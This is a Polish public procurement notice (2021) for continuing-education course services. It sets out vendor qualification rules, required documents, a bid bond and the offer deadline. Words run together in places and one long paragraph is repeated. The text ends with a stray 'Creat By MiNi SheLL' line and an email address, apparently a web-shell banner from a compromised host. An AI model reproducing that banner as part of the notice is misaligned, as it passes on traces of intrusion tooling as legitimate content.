abywykonawca prowadzący działalność gospodarczą lub zawodową był wpisany do jednego zrejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lubmiejsce zamieszkania.Zamawiający wymaga, w zakresie uprawnień do wykonywania określonejdziałalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, abywykonawca posiadał odpowiednie zezwolenie, licencję, koncesję lub wpis do rejestrudziałalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usługw kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.Wykonawca spełniwarunek, jeśli wykaże, że jest podmiotem uprawnionym do prowadzenia kształcenia kursowego,zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 19marca 2019 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2019poz. 652);Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczejlub zawodowej, o której mowa w art. 112 ust. 2 pkt 2 ustawy Pzp zostanie spełniony, jeżeli conajmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadauprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizujeusługi, do których realizacji te uprawnienia są wymagane.W celu potwierdzenia spełniania przezWykonawcę, o którym mowa w pkt. § 9 ust.2 pkt.3. SWZ warunków udziału w postępowaniudotyczących sytuacji ekonomicznej lub finansowej - Wykonawca spełni warunek jeśli przedstawidokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnejwZakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumęgwarancyjną w wysokości nie niższą niż 100 000 zł (słownie: sto tysięcy 00/100 zł.).Wykazuusług wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jestkrótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów,na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodówokreślających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czymdowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, narzecz którego usługi zostały wykonane, a jeśli wykonawca z przyczyn niezależnych od niego niejest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeńpowtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumentypotwierdzające ich należyte wykonywane powinny być wystawione w okresie ostatnich 3miesięcy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający wymaga, w zakresie zdolności do występowania w obrocie gospodarczym, abywykonawca prowadzący działalność gospodarczą lub zawodową był wpisany do jednego zrejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lubmiejsce zamieszkania.Zamawiający wymaga, w zakresie uprawnień do wykonywania określonejdziałalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, abywykonawca posiadał odpowiednie zezwolenie, licencję, koncesję lub wpis do rejestrudziałalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usługw kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.Wykonawca spełniwarunek, jeśli wykaże, że jest podmiotem uprawnionym do prowadzenia kształcenia kursowego,zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 19marca 2019 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2019poz. 652);Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczejlub zawodowej, o której mowa w art. 112 ust. 2 pkt 2 ustawy Pzp zostanie spełniony, jeżeli conajmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadauprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizujeusługi, do których realizacji te uprawnienia są wymagane.W celu potwierdzenia spełniania przezWykonawcę, o którym mowa w pkt. § 9 ust.2 pkt.3. SWZ warunków udziału w postępowaniudotyczących sytuacji ekonomicznej lub finansowej - Wykonawca spełni warunek jeśli przedstawidokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnejwZakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumęgwarancyjną w wysokości nie niższą niż 100 000 zł (słownie: sto tysięcy 00/100 zł.).Wykazuusług wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jestkrótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów,na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodówokreślających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czymdowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, narzecz którego usługi zostały wykonane, a jeśli wykonawca z przyczyn niezależnych od niego niejest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeńpowtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumentypotwierdzające ich należyte wykonywane powinny być wystawione w okresie ostatnich 3miesięcy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, który ma siedzibę lub miejsce zamieszkania poza granicami RzeczypospolitejPolskiej, zamiast: 1) informacji z Krajowego Rejestru Karnego, o których mowa w ust. 10.2.2. pkt1 składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo w przypadkubraku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lubadministracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie,o którym mowa w ust. 10.2.2. pkt 1. Dokument powinien być wystawiony nie wcześniej niż 6miesięcy przed jego złożeniem; 2) zaświadczenia, o których mowa w ust. 10.2.2. pkt 4 składazaświadczenia albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniemskładek na ubezpieczenia społeczne lub zdrowotne, o których mowa w ust. 10.2.2. pkt 4 składadokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejscezamieszkania, potwierdzające, że: a) nie naruszył obowiązków dotyczących płatności podatków,opłat lub składek na ubezpieczenie społeczne lub zdrowotne,b) nie otwarto jego likwidacji, nieogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu zwierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innejtego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejscawszczęcia tej procedury. Dokumenty powinny być wystawione nie wcześniej niż 3 miesiąceprzed ich złożeniem.Wykonawca, który polega na zdolnościach lub sytuacji podmiotówudostepniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającegozasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji usługi lub innypodmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będziedysponował niezbędnymi zasobami tych podmiotów <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wpłacić wadium w kwocie: 12.000 zł. (dwanaście tysięcy zł00/100) przed upływem terminu składania ofert, na cały okres związania ofertą od upływuterminu składania ofert <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając wspólną ofertę wtakim przypadku ponoszą solidarną odpowiedzialność za wykonanie umowy.2. Wykonawcamiwspólnie ubiegającymi się o udzielenie zamówienia mogą być:• spółka cywilna – w rozumieniuprzepisów art. 860-875 k.c.,• wykonawcy, którzy zawarli porozumienie w celu wspólnegoubiegania się o udzielenie zamówienia, nie będący spółką cywilną w rozumieniu przepisów k.c.np.: tak zwane ,,konsorcjum” dwóch lub więcej Wykonawców.Każdy z wykonawcówubiegających się wspólnie o udzielenie zamówienia musi spełnić warunek z art. 94 ust. 1 pkt 5u8stawyPzp. 3. Wykonawcy, którzy wspólnie ubiegają się o zamówienie, ustanawiają,,Pełnomocnika” do:• reprezentowania ich w postępowaniu o udzielenie zamówienia publicznegoalbo• reprezentowania w postępowaniu i zawarcia umowy.W ofercie należy złożyć oryginałpełnomocnictwa lub notarialnie potwierdzoną kopię.4. W przypadku, gdy ofertę składapełnomocnik – pełnomocnictwo do reprezentowania Wykonawcy lub Wykonawcówwystępujących wspólnie.5. W zakresie spełnienia warunków udziału w postępowaniu,Wykonawcy wspólnie ubiegający się o zamówienie składają dokumenty w taki sposób, aby przyich ocenie wspólnie spełniali w/w warunki. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie którejdokonano wyboru Wykonawcy, są możliwe w przypadkach wskazanych we wzorze umowy,stanowiącym integralną część SWZ. 2. Zmiany postanowień zawartej umowy w stosunku dotreści oferty, na podstawie której dokonano wyboru Wykonawcy, są możliwe ponadto, gdyzachodzi co najmniej jedna z okoliczności wymienionych w art. 455 Ustawy Pzp. 3. Wszelkiezmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności, chyba żeinaczej zastrzeżono we wzorze umowy. 4. Zamawiający przewiduje możliwość wprowadzeniazmian w umowie w związku z sytuacją epidemiologiczną w kraju z uwagi na wprowadzenianowych przepisów określonych w Rozporządzenie Rady Ministrów w sprawie ustanowieniaokreślonych ograniczeń, nakazów i zakazów w związku z wystąpieniem stanu epidemii <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć w formie elektronicznej za pomocą platformy zakupowej: https://platformazakupowa.pl/pn/oisw_poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 90 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com